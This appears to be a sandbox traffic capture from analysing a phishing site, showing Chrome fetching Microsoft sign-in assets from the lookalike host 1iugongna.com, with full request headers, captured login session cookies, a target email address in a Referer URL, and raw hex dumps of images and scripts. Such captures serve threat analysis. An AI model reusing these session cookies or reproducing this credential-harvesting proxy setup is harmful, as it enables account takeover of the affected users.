                                                                              2025-01-10 20:42:04 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                              Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              43192.168.2.549907207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:04 UTC1455OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:04 UTC1406INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:04 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 190151
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Thu, 27 Oct 2022 14:24:13 GMT
                                                                              ETag: 0x8DAB826EBE74413
                                                                              x-ms-request-id: 22a49cf0-601e-0020-3887-63b8f1000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204204Z-155884f84d4msscwhC1BL13yx00000000bkg00000000m05s
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:04 UTC14978INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 69 77 db 46 b2 30 fc fd fe 0a 0a 27 57 03 8c da 34 29 2f 71 48 23 bc b2 44 db 4c b4 45 4b 9c 8c ac d1 81 c8 96 04 9b 04 18 00 94 ac 91 f8 df 9f aa ea 1d 04 28 29 c9 7d ef 7b 12 8b 40 a3 7a af ae ae ae ae c5 bf 89 93 51 7a d3 2c f8 98 4f 78 91 dd 9e dd f0 f3 69 34 fc fa 53 9e 26 d3 70 e9 d7 fb fb 93 d3 a0 39 9d e5 57 fe c9 c9 fa 29 3b 61 8c 5d cc 92 61 11 a7 89 cf 59 c1 92 e0 ce 9b e5 bc 91 17 59 3c 2c bc 6e d2 cc fc 22 60 49 73 e4 17 cc fb 35 1a cf f8 cf 50 81 c7 7c 9d 2d b8 cb 78 31 cb 92 46 d6 e4 f3 40 c3 f6 af 79 52 6c 47 05 4f 86 b7 35 e0 51 19 7c 9f 67 79 9c 63 16 5e 93 e5 dc ca 72 94 45 43 be cd af f9 b8 06 78 64 01 6f 4c a7 83 24 8f 2f af 8a 7c 33 cd aa 8b 8f 9d 16 bd 8b 72 5e 0b 6a 17 7d d6 ff 06 4d 1e f1 d1 20
                                                                              Data Ascii: iwF0'W4)/qH#DLEK()}{@zQz,Oxi4S&p9W);a]aYY<,n"`Is5P|-x1F@yRlGO5Q|gyc^rECxdoL$/|3r^j}M
                                                                              2025-01-10 20:42:04 UTC1406INData Raw: 2c 78 b8 67 e4 57 f2 01 8c b1 b2 fd 6f 22 8f de 45 b0 de 85 0d 08 ce 9e 0b aa 1f 8b 11 3c 08 9b 78 48 97 78 46 a5 24 ab d9 bc 5e b4 ed cd 0b ab ad e8 df 24 ba fd 5b b7 2f b7 77 88 4f c2 67 46 4d 1f 0b 75 02 77 fb 58 84 c3 d5 d5 a1 d5 c7 aa bc 89 52 ee 73 55 63 12 54 51 9e 19 a5 98 4c 6c 9b aa 29 7f 81 0e 15 8b c8 b4 6e 6d b8 35 23 fc 77 92 1f 7d c2 7d 60 e9 5a 4e 05 80 55 57 16 ca 64 24 83 8f 7e c9 a2 18 6f be 60 b5 e3 f7 6b ee db cb 3a 66 b6 43 02 28 82 2d f7 ac 41 3e 33 02 d7 52 93 5d 5b 34 e4 fa 89 04 cc b0 a4 8b 56 fe 62 07 43 75 54 db 27 52 61 9c c6 98 e4 50 a6 06 44 5d 6a 06 b3 6a 82 95 ba 93 06 36 1c 95 4e f9 bb 66 f8 2c 4d 84 8f 0d 47 8a 26 24 6d ba 5f e8 23 82 5e ae 0b 25 99 5f 59 dc 77 52 b5 ef 64 61 dc 24 de 4f 1c 01 23 91 79 96 8d 51 e7 a8 6c
                                                                              Data Ascii: ,xgWo"E<xHxF$^$[/wOgFMuwXRsUcTQLl)nm5#w}}`ZNUWd$~o`k:fC(-A>3R][4VbCuT'RaPD]jj6Nf,MG&$m_#^%_YwRda$O#yQl
                                                                              2025-01-10 20:42:04 UTC16384INData Raw: 95 a1 50 20 13 dc 09 ae 34 e2 7c 9d 30 c3 e4 c1 b6 9c ec e3 12 20 93 46 e3 3e 5b 03 ed 8f 67 c0 df fb 78 dd a8 ae 19 4d 00 1b f1 d1 0b 4a 7e 13 a6 94 dc 94 fe 24 50 2d cd 47 c7 3d 85 da e1 a9 62 8c 17 47 aa d5 45 78 07 f5 10 07 b4 78 d7 96 12 fa cd e1 40 53 82 00 82 12 ad ae 46 4d f9 c1 a7 c0 2f 64 02 06 d0 26 7a 72 65 91 74 91 31 d8 a2 52 17 e0 ac 82 55 04 66 ae 27 73 c2 f1 f4 4e 01 40 75 31 14 5d 18 6a c4 18 b2 35 15 0a d7 1f b2 c6 32 9c 55 a1 f8 e4 d6 c7 75 7d aa 14 55 21 35 ef fd 38 ba cc eb 7b 49 9f 4d 47 4b d0 e5 be d2 67 31 94 26 37 0c 28 1e c0 a4 59 3c 4b b5 71 c3 5c 85 c2 bd 2b ec d1 92 4d 17 61 b4 95 83 6f ef 6c 96 7c 4d d2 9b e4 cc 13 1e 9b 94 25 3b 59 f4 98 d7 35 b4 ba 8c f2 2b e1 55 59 58 bd d2 fc fe e1 bb b2 80 60 9e 8b 78 bc 40 3a 5d 23 d7
                                                                              Data Ascii: P 4|0 F>[gxMJ~$P-G=bGExx@SFM/d&zret1RUf'sN@u1]j52Uu}U!58{IMGKg1&7(Y<Kq\+Maol|M%;Y5+UYX`x@:]#
                                                                              2025-01-10 20:42:04 UTC16384INData Raw: cc 68 6f b7 b7 64 ca dd ae 4a d9 e6 94 0f 04 97 4e a7 c2 f3 c0 0e a7 9c 5c a7 49 24 dd 09 ec 72 ca af 8c 88 09 2d 8c 1f 39 e5 34 9e a8 6a 9e 8b 84 db 42 a7 bc 10 4d 31 6e 5a 3c b6 5b a2 db 88 43 dd 12 3d 7d fb d7 30 69 b7 16 fa f8 3e ba 0a 07 54 7e cb df 9f e6 45 7a 1b a9 00 e4 6a 68 f2 b5 bd b5 69 c2 3f 35 45 44 aa 8f 69 2a f6 d3 1c ee fe 11 06 7b 48 f3 40 04 2d 47 ba a3 09 38 bc bd 8d 86 31 dc 16 6c 9b e0 50 7c 7f 9e e4 93 68 00 ab b6 21 cd b3 1c 6c 0b 77 e6 d6 26 55 73 2e 1e b6 90 b0 bb 4d 73 77 2e 1e 76 fc 37 e9 14 ca 0c bb 3e a8 0f 9a 1e 76 57 f0 dc 87 3a 00 b7 fb c2 84 90 d5 be 66 71 11 13 14 69 6f 9a 50 4f 16 3a 3e 3a a0 9e 1c 7c fc 78 fc 91 8a 7e de fb 78 74 78 f4 13 75 e5 f0 e8 ed f1 c7 0f 7b 67 87 c7 47 ed 2d 13 cc 11 ca 6d 0b 35 2b 02 4e 38 96
                                                                              Data Ascii: hodJN\I$r-94jBM1nZ<[C=}0i>T~Ezjhi?5EDi*{H@-G81lP|h!lw&Us.Msw.v7>vW:fqioPO:>:|x~xtxu{gG-m5+N8
                                                                              2025-01-10 20:42:04 UTC2309INData Raw: e8 02 ed b7 1b 30 09 aa 8b f1 66 7d dd 87 be a5 89 29 6d ad 56 10 1e 45 fe f0 c5 b9 27 2d 54 f4 8d b9 67 48 81 d4 bd 69 12 41 b4 ab f6 4a a9 88 ba 2e f7 14 bf d4 b7 af c8 76 f5 ce 84 88 a4 94 5f fe db 53 02 7c b1 3a 29 cc e0 d4 b9 d5 53 c2 5a f1 1f e1 60 c9 b8 fe d9 5f a6 f1 1e 54 72 f7 2c d6 a6 25 92 b2 05 54 5c b4 7c f5 7c 28 37 70 f8 65 05 40 cc 2d 6c 6a bc cc 66 37 ee 9e 80 f9 cc fa e3 37 ef 09 3a dc 42 5c 16 d1 31 a2 c7 eb d1 b0 76 6c d1 e2 73 a3 67 88 37 5c 6a b0 71 e8 99 52 9f ad a4 04 19 38 94 39 82 75 69 60 e7 f4 5c 2a b4 a1 16 43 bd ad 52 4b 99 83 5a 36 cd 5a 4a ba 22 d3 d4 48 d1 25 4a 49 0a 37 39 2a 67 69 94 18 95 d1 95 a2 45 59 7e 67 31 04 91 52 b1 e0 10 44 c8 86 46 78 19 dd 79 81 ef 00 67 8c 2f 7c 47 71 b0 b5 45 aa 18 02 b8 0d 91 67 44 1e 8a
                                                                              Data Ascii: 0f})mVE'-TgHiAJ.v_S|:)SZ`_Tr,%T\||(7pe@-ljf77:B\1vlsg7\jqR89ui`\*CRKZ6ZJ"H%JI79*giEY~g1RDFxyg/|GqEgD
                                                                              2025-01-10 20:42:04 UTC9575INData Raw: ad ed ca 9b db c6 95 fc ff fb 29 6c ee ab 14 39 86 15 49 3e 92 48 c3 a8 14 3b 87 de 24 b6 c7 ce 31 bb 1e 8d 8b 92 28 99 36 45 ea 91 94 9d 4c ec ef be 7d 00 20 40 51 76 de 66 77 6a 1c 91 00 08 82 38 1a dd 8d ee 5f 7b 1d a8 08 37 c9 9e c6 fc 78 83 3b 4c 01 55 73 4a f0 d5 9d e3 41 99 b9 98 91 1a 7f 77 af 49 ff 71 83 d1 66 50 7d 23 9a 43 71 0d b7 23 b8 dd 17 3b ea 36 80 db d6 73 f1 02 ee 2d 85 b0 41 8a 08 d9 e9 b7 ee 3b a2 30 7f 7b c2 1c b5 c2 1e 2d 7b 68 ec 75 51 0e ce ca 33 78 56 c0 06 f7 85 e6 3d 77 45 a1 78 4f 65 ca 21 97 f6 af 51 af b4 ca aa 81 e3 43 0b 65 84 0e ea 64 2a 72 94 27 dd 57 b2 c7 46 34 a3 11 3d 4a 93 53 3c bb 46 15 d3 19 b9 09 78 02 be be 2a 75 a4 56 2f 81 00 5b 13 13 89 23 04 f9 19 52 73 d2 56 b3 f2 98 4c be 28 4c b7 d4 1b 27 b6 de 38 2c 55
                                                                              Data Ascii: )l9I>H;$1(6EL} @Qvfwj8_{7x;LUsJAwIqfP}#Cq#;6s-A;0{-{huQ3xV=wExOe!QCed*r'WF4=JS<Fx*uV/[#RsVL(L'8,U


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              44192.168.2.549915207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:05 UTC1480OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:05 UTC755INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:05 GMT
                                                                              Content-Type: image/gif
                                                                              Content-Length: 3620
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                                              ETag: 0x8D79B8373B17F89
                                                                              x-ms-request-id: c2eefb0a-801e-0020-5ca0-63cf4e000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204205Z-155884f84d45wptthC1BL18x980000000bmg00000001bv3r
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:05 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                              Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              45192.168.2.549917207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:05 UTC1755OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:05 UTC744INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:05 GMT
                                                                              Content-Type: image/x-icon
                                                                              Content-Length: 17174
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                                              ETag: 0x8D8731230C851A6
                                                                              x-ms-request-id: 4bb1a76d-a01e-004d-5da4-600cba000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204205Z-155884f84d4k4q4phC1BL1wx1s0000000bq000000000vw1u
                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:05 UTC15640INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                              Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                              2025-01-10 20:42:05 UTC1534INData Raw: 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22
                                                                              Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              46192.168.2.549918207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:05 UTC1724OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
